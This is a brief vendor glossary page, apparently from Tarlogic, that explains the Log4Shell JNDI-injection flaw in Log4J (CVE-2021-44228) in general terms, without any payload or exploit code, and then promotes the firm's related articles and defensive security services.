Log4Shell is a remote vulnerability that affects the Java Log4J component used by thousands of applications to keep logs of application activity.
The name Log4Shell was assigned to the vulnerability identified by Miter as CVE-2021-44228 and it took advantage of a data filtering flaw that reaches this component, allowing a JNDI injection to be carried out. Through this flaw it was possible to inject specially crafted strings that allowed arbitrary code execution.
In most cases, it was simply necessary to add this content to any HTTP request to force the Log4J component to establish a connection against the attacker’s ldap server and execute arbitrary code.
Cybersecurity articles related to Log4Shell
Various technical articles concerning Log4Shell and cybersecurity have been released on Tarlogic’s web page.
- Log4shell full picture: All the vulnerabilities affecting Log4j
- Log4Shell vulnerability CVE-2021-44228, the new cyber-apocalypse
- Tracking JNDI attacks: Hunting Log4Shell in your network
- CVE-2022-42889: Text4Shell, Critical Vulnerability in Apache Commons Text
Cybersecurity services related to Log4Shell
Vulnerability management: This continuous vulnerability assessment service allows for managing the vulnerability life cycle and minimizing the exposure surface.
- More information: Vulnerability management as a service
Emerging vulnerabilities: This service is triggered when a critical vulnerability, like Log4Shell, that could impact your organization’s perimeter is published, enabling early reaction. We examine the impact of zero-day vulnerabilities on the perimeter 24 hours a day, 7 days a week, and pinpoint affected assets.
- More information: Emerging Threats service
Threat Hunting: A managed service focused on the proactive detection of of suspicious behavior and threat containment in endpoints, utilizing telemetry produced by EDR and XDR technologies, and adhering to the methodology outlined in the MITRE ATT&CK framework.
- More information: Threat Hunting service